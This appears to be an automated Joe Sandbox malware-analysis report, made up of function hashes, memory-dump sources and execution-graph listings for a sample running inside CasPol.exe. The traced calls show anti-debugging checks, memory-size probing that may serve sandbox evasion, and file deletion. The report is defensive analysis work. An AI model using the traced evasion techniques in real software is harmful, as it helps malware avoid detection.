                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_52_2_7ff7c19f0000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f92906b42af21187cde5b458eb0c38f25945fde8133ca87eb98c81980ace2c27
                                                                                                                                                                                                                                                    • Instruction ID: 89cab3e543c3da3aca74afb5c267c927f8e8ab86a4bb3db09161397d8eacd04d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f92906b42af21187cde5b458eb0c38f25945fde8133ca87eb98c81980ace2c27
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A361163150DAC94FDB56EF2888645A5BBF1EF5B31470901FBC44ACB193CA28A805C791
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00007FF7C19F0A04 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000034.00000002.1669614294.00007FF7C19F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19F0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_52_2_7ff7c19f0000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 36f905440a0209af5a14169cc126b6152331871d1a64dd4ffbb6942882bd1bc6
                                                                                                                                                                                                                                                    • Instruction ID: 53294f4cec177ae39caa22d9dd7d27da0a1478b49e07ea563c52af659408362c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36f905440a0209af5a14169cc126b6152331871d1a64dd4ffbb6942882bd1bc6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41E01230A14A298EDF60EB58CC81BEAB3B1FB88310F1041E6D44DE3251CB306A84CF82
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:11.6%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:141
                                                                                                                                                                                                                                                    Total number of Limit Nodes:13
                                                                                                                                                                                                                                                    execution_graph 40382 6223ae0 DuplicateHandle 40383 6223b76 40382->40383 40546 6223898 40547 62238de GetCurrentProcess 40546->40547 40549 6223930 GetCurrentThread 40547->40549 40550 6223929 40547->40550 40551 6223966 40549->40551 40552 622396d GetCurrentProcess 40549->40552 40550->40549 40551->40552 40555 62239a3 40552->40555 40553 62239cb GetCurrentThreadId 40554 62239fc 40553->40554 40555->40553 40384 1440848 40386 144084e 40384->40386 40385 144091b 40386->40385 40390 144137f 40386->40390 40399 6222790 40386->40399 40403 6222780 40386->40403 40392 144138b 40390->40392 40391 14414be 40391->40386 40392->40391 40407 1448a20 40392->40407 40412 144829c 40392->40412 40417 14482da 40392->40417 40422 1448339 40392->40422 40427 1448170 40392->40427 40432 1448161 40392->40432 40400 622279f 40399->40400 40459 6221f24 40400->40459 40404 622279f 40403->40404 40405 6221f24 4 API calls 40404->40405 40406 62227c0 40405->40406 40406->40386 40408 1448a2a 40407->40408 40409 1448a44 40408->40409 40437 624fa28 40408->40437 40442 624fa18 40408->40442 40409->40392 40413 14482a1 40412->40413 40447 14487e8 40413->40447 40451 14487d8 40413->40451 40414 14483cb 40414->40392 40419 14482df 40417->40419 40418 14483cb 40418->40392 40420 14487d8 DeleteFileW 40419->40420 40421 14487e8 DeleteFileW 40419->40421 40420->40418 40421->40418 40424 144833e 40422->40424 40423 14483cb 40423->40392 40425 14487d8 DeleteFileW 40424->40425 40426 14487e8 DeleteFileW 40424->40426 40425->40423 40426->40423 40429 1448189 40427->40429 40428 14483cb 40428->40392 40429->40428 40430 14487d8 DeleteFileW 40429->40430 40431 14487e8 DeleteFileW 40429->40431 40430->40428 40431->40428 40434 1448189 40432->40434 40433 14483cb 40433->40392 40434->40433 40435 14487d8 DeleteFileW 40434->40435 40436 14487e8 DeleteFileW 40434->40436 40435->40433 40436->40433 40439 624fa3d 40437->40439 40438 624fc52 40438->40409 40439->40438 40440 624fc68 GlobalMemoryStatusEx GlobalMemoryStatusEx 40439->40440 40441 624fc78 GlobalMemoryStatusEx GlobalMemoryStatusEx 40439->40441 40440->40439 40441->40439 40444 624fa3d 40442->40444 40443 624fc52 40443->40409 40444->40443 40445 624fc68 GlobalMemoryStatusEx GlobalMemoryStatusEx 40444->40445 40446 624fc78 GlobalMemoryStatusEx GlobalMemoryStatusEx 40444->40446 40445->40444 40446->40444 40448 14487f8 40447->40448 40449 144882a 40448->40449 40455 1447790 40448->40455 40449->40414 40452 14487f8 40451->40452 40453 1447790 DeleteFileW 40452->40453 40454 144882a 40452->40454 40453->40454 40454->40414 40456 1448848 DeleteFileW 40455->40456 40458 14488c7 40456->40458 40458->40449 40460 6221f2f 40459->40460 40463 6223694 40460->40463 40462 6224146 40462->40462 40464 622369f 40463->40464 40465 622486c 40464->40465 40467 62264e8 40464->40467 40465->40462 40468 6226509 40467->40468 40469 622652d 40468->40469 40471 6226698 40468->40471 40469->40465 40473 62266a5 40471->40473 40472 62266de 40472->40469 40473->40472 40475 62253bc 40473->40475 40476 62253c7 40475->40476 40478 6226750 40476->40478 40479 62253f0 40476->40479 40478->40478 40480 62253fb 40479->40480 40486 6225400 40480->40486 40482 62267bf 40490 622bac8 40482->40490 40498 622bae0 40482->40498 40483 62267f9 40483->40478 40489 622540b 40486->40489 40487 6227960 40487->40482 40488 62264e8 4 API calls 40488->40487 40489->40487 40489->40488 40491 622bad8 40490->40491 40492 622bb1d 40491->40492 40507 622bd48 40491->40507 40511 622bd58 40491->40511 40492->40483 40493 622bb5d 40515 622d058 40493->40515 40520 622d049 40493->40520 40500 622bb11 40498->40500 40501 622bc11 40498->40501 40499 622bb1d 40499->40483 40500->40499 40503 622bd48 2 API calls 40500->40503 40504 622bd58 2 API calls 40500->40504 40501->40483 40502 622bb5d 40505 622d058 2 API calls 40502->40505 40506 622d049 2 API calls 40502->40506 40503->40502 40504->40502 40505->40501 40506->40501 40508 622bd54 40507->40508 40525 622bd98 40508->40525 40509 622bd62 40509->40493 40512 622bd5a 40511->40512 40514 622bd98 2 API calls 40512->40514 40513 622bd62 40513->40493 40514->40513 40516 622d083 40515->40516 40517 622d132 40516->40517 40533 622de30 40516->40533 40538 622deb1 40516->40538 40521 622d054 40520->40521 40522 622d132 40521->40522 40523 622de30 CreateWindowExW 40521->40523 40524 622deb1 CreateWindowExW 40521->40524 40522->40522 40523->40522 40524->40522 40526 622bd9d 40525->40526 40527 622bddc 40526->40527 40531 622c033 LoadLibraryExW 40526->40531 40532 622c040 LoadLibraryExW 40526->40532 40527->40509 40528 622bfe0 GetModuleHandleW 40530 622c00d 40528->40530 40529 622bdd4 40529->40527 40529->40528 40530->40509 40531->40529 40532->40529 40535 622de34 40533->40535 40534 622de80 40534->40517 40535->40517 40535->40534 40536 622e053 CreateWindowExW 40535->40536 40537 622e0b4 40536->40537 40537->40537 40540 622deb4 40538->40540 40539 622df00 40539->40517 40540->40517 40540->40539 40541 622e053 CreateWindowExW 40540->40541 40542 622e0b4 40541->40542 40542->40542 40543 14470c8 40544 144710c CheckRemoteDebuggerPresent 40543->40544 40545 144714e 40544->40545

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 06242360 Relevance: 1.5, Instructions: 1493COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7218cc007962fe99cee8b56f46c9637fd49e4c64565a80fc90e9eb35602425f1
                                                                                                                                                                                                                                                    • Instruction ID: 4f33bd84207c47bb5ca763ad949b6b4e53fc7528ea1af327c05a77465d0b0eda
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7218cc007962fe99cee8b56f46c9637fd49e4c64565a80fc90e9eb35602425f1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8D23B30E10215CFDB68EB69C484A9DB7B2FF89310F54C5A9E809AB251DB35ED85CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624B228 Relevance: .8, Instructions: 766COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7b739ad53dcd82fdf53697e372266e97eea191053ae382613dc8a0eec4fa95f8
                                                                                                                                                                                                                                                    • Instruction ID: 909f64d3acadf132aab61a1a4df4f53c1b7d12770bcb12a9bc731934472180ac
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b739ad53dcd82fdf53697e372266e97eea191053ae382613dc8a0eec4fa95f8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79528270E2020A8FEF68EB69D4947ADB7B6FB45311F608429D806EB351DB34DC81CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0624C170 Relevance: .6, Instructions: 638COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5d34944327643f26ec9a91e223ae389a8d6bbeb8f8e77df87e5f8e59bd20a1da
                                                                                                                                                                                                                                                    • Instruction ID: 43a28802a7ba5e89c1e0ade74dfcf414799b27db07db6943f8038fa7fef80350
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d34944327643f26ec9a91e223ae389a8d6bbeb8f8e77df87e5f8e59bd20a1da
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3332B574B112099FDB58EB6CE484BADBBB6FB88350F108525D805EB351DB35EC81CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06247D78 Relevance: .5, Instructions: 473COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542531304.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6240000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: def64406fd57d5f379f1398c26649b0cf241710da2164916f441c1840debd580
                                                                                                                                                                                                                                                    • Instruction ID: 5234c8908ca9b1bda51d60220721704c90e7db3147affdcf8db5fa974e7721c1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: def64406fd57d5f379f1398c26649b0cf241710da2164916f441c1840debd580
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C402A430B202158FDB58EB69D494BAEBBE2FF84300F148569D815DB391DB75EC82CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0622388A Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06223916
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 06223953
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06223990
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 062239E9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                                                                                                                    • Opcode ID: aad72ac47d68a4ba26fb583968b47ce3761da8f676e2d65baa2fbf7a6ed19746
                                                                                                                                                                                                                                                    • Instruction ID: 9192d328412eded830974ba333ffbc101d9a07dd695078c45b87dccaa282395d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aad72ac47d68a4ba26fb583968b47ce3761da8f676e2d65baa2fbf7a6ed19746
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C5187B1D1030A8FDB54CFA9D948BAEBBF1EF48300F248419D459A7350DB385944CF65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06223898 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06223916
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 06223953
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 06223990
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 062239E9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                                                                                                                    • Opcode ID: df069b9e03ce85f8a3e4f22d46ac25cc17eae2246af820fdaa95a844b3d6fe2c
                                                                                                                                                                                                                                                    • Instruction ID: 4b74dc737ab1f2fe24b25bea2e8dba2813b567416ba0362a0b75bbcf644c1c48
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: df069b9e03ce85f8a3e4f22d46ac25cc17eae2246af820fdaa95a844b3d6fe2c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D15175B0D1030A9FDB54CFAAD948BAEBBF1EB48300F208429E459A7350DB385984CF65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0622DE30 Relevance: 1.8, APIs: 1, Instructions: 285COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 833 622de30-622de32 834 622de34-622de38 833->834 835 622de3a 833->835 834->835 836 622de42-622de58 835->836 837 622de3c 835->837 838 622de5b-622de7e 836->838 837->838 839 622de3e-622de40 837->839 840 622de80-622de83 838->840 841 622de86-622de92 838->841 839->836 843 622de94-622de98 841->843 844 622de9a 841->844 843->844 845 622dea2-622deba 844->845 846 622de9c-622de9d 844->846 848 622dec2-622ded2 845->848 849 622debc-622dec0 845->849 846->845 851 622ded4-622ded8 848->851 852 622deda 848->852 849->848 851->852 853 622dee2-622defe 852->853 854 622dedc-622dee0 852->854 855 622df00-622df03 853->855 856 622df06-622df12 853->856 854->853 858 622df14-622df18 856->858 859 622df1a 856->859 858->859 860 622df22-622df32 859->860 861 622df1c-622df20 859->861 863 622df34-622df39 860->863 864 622df3a 860->864 861->860 863->864 865 622df42-622df44 864->865 866 622df3c-622df3e 864->866 867 622df46-622df70 call 622aec4 865->867 868 622df7e-622df86 865->868 866->865 874 622df75-622df76 867->874 870 622df88-622df8c 868->870 871 622df8e 868->871 870->871 872 622df90-622df95 871->872 873 622df96-622dff6 871->873 872->873 875 622e001-622e008 873->875 876 622dff8-622dffe 873->876 877 622e013-622e0b2 CreateWindowExW 875->877 878 622e00a-622e010 875->878 876->875 880 622e0b4-622e0ba 877->880 881 622e0bb-622e0f3 877->881 878->877 880->881 885 622e100 881->885 886 622e0f5-622e0f8 881->886 887 622e101 885->887 886->885 887->887
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9cf0b693be6d139fd58f0584fb7a56feb147d9fa1cb8a368ec608175cb42699e
                                                                                                                                                                                                                                                    • Instruction ID: e06f7043f4959588ced16fa7a6b851fb715e09618000b0090a9da4c266db0d02
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cf0b693be6d139fd58f0584fb7a56feb147d9fa1cb8a368ec608175cb42699e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2891B3B1C1939AAFDF52CFA5C8409CDBFB1AF4A350F19859AF8449B262C3319846CF51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0622BD98 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 888 622bd98-622bdb7 890 622bde3-622bde7 888->890 891 622bdb9-622bdc6 call 622ad0c 888->891 892 622bdfb-622be3c 890->892 893 622bde9-622bdf3 890->893 898 622bdc8 891->898 899 622bddc 891->899 900 622be49-622be57 892->900 901 622be3e-622be46 892->901 893->892 946 622bdce call 622c033 898->946 947 622bdce call 622c040 898->947 899->890 902 622be7b-622be7d 900->902 903 622be59-622be5e 900->903 901->900 906 622be80-622be87 902->906 907 622be60-622be67 call 622ad18 903->907 908 622be69 903->908 904 622bdd4-622bdd6 904->899 905 622bf18-622bf96 904->905 939 622bf98-622bf9d 905->939 940 622bf9e-622bfd8 905->940 910 622be94-622be9b 906->910 911 622be89-622be91 906->911 909 622be6b-622be79 907->909 908->909 909->906 913 622bea8-622beb1 call 62243fc 910->913 914 622be9d-622bea5 910->914 911->910 920 622beb3-622bebb 913->920 921 622bebe-622bec3 913->921 914->913 920->921 922 622bee1-622beee 921->922 923 622bec5-622becc 921->923 929 622bef0-622bf0e 922->929 930 622bf11-622bf17 922->930 923->922 925 622bece-622bede call 6228c84 call 622ad28 923->925 925->922 929->930 939->940 941 622bfe0-622c00b GetModuleHandleW 940->941 942 622bfda-622bfdd 940->942 943 622c014-622c028 941->943 944 622c00d-622c013 941->944 942->941 944->943 946->904 947->904
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0622BFFE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: HandleModule
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4139908857-0
                                                                                                                                                                                                                                                    • Opcode ID: 024034e24ac1f5b0598d6184a5059e8daccfe646d199ba52d144477e1a9a6752
                                                                                                                                                                                                                                                    • Instruction ID: b0cea1356e90ec3c752ea24bcc5dfe42299fba97663cb3e2b2c70c73e35315ca
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 024034e24ac1f5b0598d6184a5059e8daccfe646d199ba52d144477e1a9a6752
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC817770A10B169FD7A4DF2AD44475ABBF1FF88308F00892DE88ACBA50D774E845CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0622DF90 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1080 622df90-622dff6 1082 622e001-622e008 1080->1082 1083 622dff8-622dffe 1080->1083 1084 622e013-622e04b 1082->1084 1085 622e00a-622e010 1082->1085 1083->1082 1086 622e053-622e0b2 CreateWindowExW 1084->1086 1085->1084 1087 622e0b4-622e0ba 1086->1087 1088 622e0bb-622e0f3 1086->1088 1087->1088 1092 622e100 1088->1092 1093 622e0f5-622e0f8 1088->1093 1094 622e101 1092->1094 1093->1092 1094->1094
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0622E0A2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2542012343.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_6220000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateWindow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 716092398-0
                                                                                                                                                                                                                                                    • Opcode ID: a2fb4dbdd03e24727356616eb024801164b7c096eb1bdd391a06aa36b394921b
                                                                                                                                                                                                                                                    • Instruction ID: 3c3608f7f77bb8d1f1a4ff429b35b83d761c3fc38e183f93b30b3a9ac5c4c0c5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2fb4dbdd03e24727356616eb024801164b7c096eb1bdd391a06aa36b394921b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1841D2B1D10359AFDB14CF99C884ADEBBB5FF48300F65852AE818AB210D7719945CF90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 014470C1 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1095 14470c1-144714c CheckRemoteDebuggerPresent 1097 1447155-1447190 1095->1097 1098 144714e-1447154 1095->1098 1098->1097
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0144713F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2516667010.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_1440000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662101638-0
                                                                                                                                                                                                                                                    • Opcode ID: ff69bc5208c9c4e6c7023e541af668820dfeb39a1754e08bcf967ab442143eba
                                                                                                                                                                                                                                                    • Instruction ID: aebaca26e3f73ef8526d2eeebef9c78c532feb305b922a598ee64abe966fdfa8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff69bc5208c9c4e6c7023e541af668820dfeb39a1754e08bcf967ab442143eba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C2178B2D003598FDB14CFA9C8847EEBBF5AF48210F14842AE455E7391D3789945CF60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 014470C8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1101 14470c8-144714c CheckRemoteDebuggerPresent 1103 1447155-1447190 1101->1103 1104 144714e-1447154 1101->1104 1104->1103
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0144713F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000038.00000002.2516667010.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_56_2_1440000_CasPol.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3662101638-0
                                                                                                                                                                                                                                                    • Opcode ID: b2eab8af5b2a44750b46b5dd55c84a80ddc2ccfe87036c41469ad3881632a876
                                                                                                                                                                                                                                                    • Instruction ID: 5e4752dfa83930486e8ca73a1c4537dac3a748ac1dbdf28aa33d0fc36063d957
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b2eab8af5b2a44750b46b5dd55c84a80ddc2ccfe87036c41469ad3881632a876
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B72145B28002598FDB14CF9AD884BEEBBF5AF48210F14842AE859A3350D778A944CF60
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 06223AD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1107 6223ad8-6223b74 DuplicateHandle 1108 6223b76-6223b7c 1107->1108 1109 6223b7d-6223b9a 1107->1109 1108->1109
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06223B67
                                                                                                                                                                                                                                                    Memory Dump Source
